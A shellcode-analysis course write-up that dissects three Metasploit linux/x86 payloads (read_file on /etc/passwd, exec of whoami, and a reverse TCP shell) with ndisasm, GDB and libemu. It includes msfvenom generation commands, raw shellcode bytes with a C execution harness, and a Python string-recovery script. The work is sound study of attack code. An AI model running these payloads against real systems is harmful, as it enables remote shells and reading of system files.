Assignment

  • Take up at least 3 shellcode samples created using Msfpayload for linux/x86
  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis

Shellcode – linux/x86/read_file (Ndisasm)

Starting simple, we chose the read_file payload from msfvenom. A quick look at the options shows that the file descriptor (FD) defaults to 1, which is STDOUT, so we only need to supply the PATH option to generate our shellcode.

suls@kali:~/slae/Assignment-5$ msfvenom -p linux/x86/read_file --list-options
Options for payload/linux/x86/read_file:
=========================


       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 62
       Rank: Normal

Provided by:
    hal

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

Description:
  Read up to 4096 bytes from the local file system and write it back 
  out to the specified file descriptor

We generate our shellcode with the command seen below.

msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -o read_file_shellcode 

Then disassemble the shellcode using Ndisasm

cat read_file_shellcode | ndisasm -u -

Line-by-line analysis of the shellcode is provided below. At a high level the following syscalls are made, in order, to open the file, read it and write its contents to STDOUT:

  • open("/etc/passwd", 0)          flags 0 = O_RDONLY
  • read(fd, buf, 4096)             fd is the value returned by open(), buf is the stack at ESP
  • write(1, buf, bytes_read)       count is the value returned by read()
  • exit(0)

00000000  EB36              jmp short 0x38               # Jump to 00000038, which calls 0x2 (JMP-CALL-POP technique);
                                                         # the call pushes the address of the file path (0000003D) as its return address
00000002  B805000000        mov eax,0x5                  # Syscall 5 = open
00000007  5B                pop ebx                      # Pop the file path address (0000003D) into EBX
00000008  31C9              xor ecx,ecx                  # Zero ECX = flags 0 = O_RDONLY
0000000A  CD80              int 0x80                     # Syscall open(const char *pathname, int flags)
0000000C  89C3              mov ebx,eax                  # Move the file descriptor returned by open() in EAX into EBX
0000000E  B803000000        mov eax,0x3                  # Syscall 3 = read
00000013  89E7              mov edi,esp                  # EDI = current stack pointer
00000015  89F9              mov ecx,edi                  # Point ECX at the top of the stack = buffer for the bytes read
00000017  BA00100000        mov edx,0x1000               # 4096 = maximum number of bytes to read
0000001C  CD80              int 0x80                     # Syscall read(int fd, void *buf, size_t count)
0000001E  89C2              mov edx,eax                  # Number of bytes actually read becomes the count for write
00000020  B804000000        mov eax,0x4                  # Syscall 4 = write
00000025  BB01000000        mov ebx,0x1                  # File descriptor 1 = STDOUT (the FD option)
0000002A  CD80              int 0x80                     # Syscall write(int fd, const void *buf, size_t count)
0000002C  B801000000        mov eax,0x1                  # Syscall 1 = exit
00000031  BB00000000        mov ebx,0x0                  # Return code 0
00000036  CD80              int 0x80                     # Syscall exit(0), clean exit
00000038  E8C5FFFFFF        call 0x2                     # Call 0x2, the call half of the JMP-CALL-POP sequence
0000003D  2F                das                          # The remaining bytes are not code: ndisasm is decoding the
0000003E  657463            gs jz 0xa4                   # NUL-terminated file path "/etc/passwd" as instructions
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00                      # String terminator

Two things are worth noting before reusing this payload. Every mov reg,imm32 (B8/BA/BB followed by a 32-bit immediate) and the string terminator contain NUL bytes, so it cannot be delivered through a C-string copy without an encoder. There is also no error handling: if open() fails, its negative return value is passed straight through as the fd for read(), and the negative count from read() becomes the length passed to write().

Shellcode – linux/x86/exec (GDB)

For our second shellcode we review the Metasploit linux/x86/exec payload with GDB. First we generate the shellcode with msfvenom, using the C output format so it can be dropped straight into a test harness:

msfvenom -p linux/x86/exec -f c CMD=whoami  
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 42 bytes
Final size of c file: 201 bytes
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";

We paste this into our shellcode.c program in order to compile and execute the code:

#include<stdio.h>
#include<string.h>

/* Raw linux/x86/exec CMD=whoami payload from msfvenom above.
   A global array lives in the data segment, which is not executable
   by default, so the harness has to be built with the usual
   executable-stack recipe (gcc -fno-stack-protector -z execstack)
   for the call below to work instead of faulting. */
unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";

int main()
{
	/* Cast the buffer to a function pointer and jump into the shellcode */
	int (*ret)() = (int(*)())code;
	ret();
}

We then compile and test (e.g. gcc -fno-stack-protector -z execstack shellcode.c -o shellcode_GDB, since the code array needs to sit in executable memory).

Next we run the binary under GDB, break at the start of the code array and disassemble it:

gdb ./shellcode_GDB
break *&code
set disassembly-flavor intel
run
Breakpoint 1, 0x0804a040 in code ()
(gdb) disassemble 
Dump of assembler code for function code:
=> 0x0804a040 <+0>:	push   0xb
   0x0804a042 <+2>:	pop    eax
   0x0804a043 <+3>:	cdq    
   0x0804a044 <+4>:	push   edx
   0x0804a045 <+5>:	pushw  0x632d
   0x0804a049 <+9>:	mov    edi,esp
   0x0804a04b <+11>:	push   0x68732f
   0x0804a050 <+16>:	push   0x6e69622f
   0x0804a055 <+21>:	mov    ebx,esp
   0x0804a057 <+23>:	push   edx
   0x0804a058 <+24>:	call   0x804a064 <code+36>
   0x0804a05d <+29>:	ja     0x804a0c7
   0x0804a05f <+31>:	outs   dx,DWORD PTR ds:[esi]
   0x0804a060 <+32>:	popa   
   0x0804a061 <+33>:	ins    DWORD PTR es:[edi],dx
   0x0804a062 <+34>:	imul   eax,DWORD PTR [eax],0xe1895357
   0x0804a068 <+40>:	int    0x80
   0x0804a06a <+42>:	add    BYTE PTR [eax],al
End of assembler dump.

Everything after the call at <+24> is junk disassembly: the call jumps over the bytes 77 68 6f 61 6d 69 00 ("whoami\0"), and GDB's linear sweep decodes those, together with the push edi; push ebx; mov ecx,esp (57 53 89 e1) that follows them, as ja/outs/popa/ins/imul. The instruction of interest is the syscall at 0x0804a068, so we set a break point there with:

break *0x0804a068
continue

Reviewing the registers we find the following:

(gdb) info registers 
eax            0xb	11
ecx            0xbfffee2e	-1073746386
edx            0x0	0
ebx            0xbfffee3e	-1073746370
esp            0xbfffee2e	0xbfffee2e
ebp            0xbfffee68	0xbfffee68
esi            0xb7fba000	-1208246272
edi            0xbfffee46	-1073746362
eip            0x804a068	0x804a068 <code+40>
eflags         0x286	[ PF SF IF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

This indicates that the execve syscall is being made, as eax is 11. The man page for execve gives the parameters, execve(const char *filename, char *const argv[], char *const envp[]), which the int 0x80 convention passes in EBX, ECX and EDX respectively.

Examining the memory at 0xbfffee3e (EBX) we can see the first argument is /bin/sh:

(gdb) x/1s  0xbfffee3e
0xbfffee3e:	"/bin/sh"

I was struggling to work out the string array at ECX via GDB alone, so I installed the PEDA extension to make things a little clearer. Using PEDA we can see the array of arguments passed to the syscall is on the stack at 0xbfffee2e: "/bin/sh", "-c" and "whoami" respectively:

Finally EDX is 0x0 for the envp argument (no environment). Looking back at the disassembly shows how the argv array was assembled: pushw 0x632d leaves "-c" on the stack (EDI points at it), push 0x68732f and push 0x6e69622f leave "/bin/sh" (EBX points at it), push edx adds the NULL terminator, the call pushes the address of the "whoami" string that follows it as its return address, and push edi; push ebx complete the array before mov ecx,esp. This concludes our analysis, the resulting command being:

execve("/bin/sh", ["/bin/sh", "-c", "whoami"], NULL)
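
Both payloads hide their strings the same way, so here is one added example (my own code, not part of the original post or of Metasploit) that recovers them statically: it scans raw linux/x86 shellcode for a CALL whose return address points at a NUL-terminated string (the JMP-CALL-POP of read_file and the call-over-string of exec), then joins consecutive PUSH immediates into the strings they leave on the stack ("-c" and "/bin/sh" in exec). The two sample inputs are constructed by transcribing the bytes from the ndisasm and GDB listings above; the function and field names are my own.

```python
"""Static recovery of strings embedded in msfvenom linux/x86 payloads.

Covers two tricks: a string that a CALL skips over (read_file reaches the
call by a JMP and the callee POPs the address; exec uses the pushed return
address directly as argv[2]), and strings assembled on the stack from
consecutive PUSH imm instructions. This is a byte-pattern scan, not a
disassembler, so data found by the first pass is masked from the second.
"""
import string
import struct

PRINTABLE = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")

# Constructed inputs: bytes transcribed from the ndisasm/GDB listings above.
READ_FILE = bytes.fromhex(
    "eb36" "b805000000" "5b" "31c9" "cd80" "89c3" "b803000000" "89e7" "89f9"
    "ba00100000" "cd80" "89c2" "b804000000" "bb01000000" "cd80"
    "b801000000" "bb00000000" "cd80" "e8c5ffffff"
) + b"/etc/passwd\x00"

EXEC = bytes.fromhex(
    "6a0b5899526668" "2d6389e7" "682f736800" "682f62696e" "89e352"
    "e807000000" "77686f616d6900" "575389e1cd80"
)


def cstring_at(code, off):
    """Printable NUL-terminated ASCII string starting at off, else None."""
    end = code.find(b"\x00", off)
    if end == -1:
        return None
    s = code[off:end]
    return s.decode("ascii") if len(s) >= 2 and all(b in PRINTABLE for b in s) else None


def extract_call_strings(code):
    """Every E8 rel32 whose return address (off + 5) points at a string."""
    found = []
    for off in range(len(code) - 4):
        if code[off] != 0xE8:
            continue
        rel = struct.unpack_from("<i", code, off + 1)[0]
        target = off + 5 + rel
        s = cstring_at(code, off + 5)
        if s is None or not 0 <= target <= len(code):
            continue
        string_end = off + 5 + len(s) + 1          # one past the NUL terminator
        if rel < 0:                                # callee is behind us: JMP-CALL-POP
            kind = "jmp-call-pop"
            # locate the JMP SHORT (EB rel8) that transferred control to this CALL
            jmp_at = next((j for j in range(off) if code[j] == 0xEB and
                           j + 2 + struct.unpack_from("<b", code, j + 1)[0] == off), None)
        elif target == string_end:                 # CALL lands right after the string
            kind, jmp_at = "call-over-string", None
        else:
            continue                               # an ordinary call, not a string trick
        found.append({"call_at": off, "target": target, "string": s, "kind": kind,
                      "jmp_at": jmp_at, "data": (off + 5, string_end)})
    return found


def extract_stack_strings(code, skip=()):
    """Join runs of consecutive PUSH imm8/imm16/imm32 into the bytes they leave on
    the stack (the last push lands at the lowest address, so runs are reversed).
    `skip` holds (start, end) byte ranges already known to be data."""
    out, run, pos = [], [], 0

    def flush():
        if run:
            raw = b"".join(reversed(run)).split(b"\x00", 1)[0]
            if len(raw) >= 2 and all(b in PRINTABLE for b in raw):
                out.append(raw.decode("ascii"))
        run.clear()

    while pos < len(code):
        op = code[pos]
        if any(a <= pos < b for a, b in skip):
            flush(); pos += 1
        elif op == 0x66 and pos + 3 < len(code) and code[pos + 1] == 0x68:   # pushw imm16
            run.append(code[pos + 2:pos + 4]); pos += 4
        elif op == 0x6A and pos + 1 < len(code):                             # push imm8, sign-extended
            run.append(struct.pack("<i", struct.unpack_from("<b", code, pos + 1)[0])); pos += 2
        elif op == 0x68 and pos + 4 < len(code):                             # push imm32
            run.append(code[pos + 1:pos + 5]); pos += 5
        else:
            flush(); pos += 1
    flush()
    return out


def recover_strings(code):
    """Run both passes, masking call-string data before the PUSH scan."""
    calls = extract_call_strings(code)
    return {"call": calls, "stack": extract_stack_strings(code, [c["data"] for c in calls])}


if __name__ == "__main__":
    for name, sample in (("read_file", READ_FILE), ("exec", EXEC)):
        print(name, recover_strings(sample))
```

Masking the call-string range before the PUSH scan matters: the "h" in "whoami" is 0x68, the opcode of push imm32, and without the mask the scanner reports a bogus stack string "oami" from inside the command text.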

Shellcode – linux/x86/shell_reverse_tcp (libemu)

For our final shellcode we analyse the Metasploit linux/x86/shell_reverse_tcp payload with libemu. We generate the shellcode to a raw file with the following command:

msfvenom -p linux/x86/shell_reverse_tcp RPORT=4444 RHOST=192.168.1.1 -o shell-reverse-tcp

We use the following guide to install libemu within our Ubuntu VM, https://www.doyler.net/security-not-included/libemu-installation, and then analyse the shellcode with the following command:

cat shell-reverse-tcp | sctest -vvv -Ss 100000 verbose=3

This provides us with the following breakdown of the code:

[emu 0x0x85b7480 debug ] cpu state    eip=0x00417000
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 31DB                            xor ebx,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417002
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] F7E3                            mul ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417004
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417005
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 43                              inc ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417006
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417007
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 6A02                            push byte 0x2
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417009
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700b
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700f
[emu 0x0x85b7480 debug ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 93                              xchg eax,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417010
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00416fc2  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 59                              pop ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=2);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=1);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417018
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 68C0A80185                      push dword 0x8501a8c0
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041701d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 680200115C                      push dword 0x5c110002
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417022
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417024
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417026
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 50                              push eax
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417027
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 51                              push ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417028
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417029
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B303                            mov bl,0x3
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702b
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
connect
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702f
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417030
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 686E2F7368                      push dword 0x68732f6e
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417035
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416faa  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 682F2F6269                      push dword 0x69622f2f
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703a
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E3                            mov ebx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703c
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703e
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417040
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B00B                            mov al,0xb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417042
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
execve
int execve (const char *dateiname=00416fa6={//bin/sh}, const char * argv[], const char *envp[]);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417044
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 0000                            add [eax],al
cpu error error accessing 0x00000004 not mapped

stepcount 42
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417046
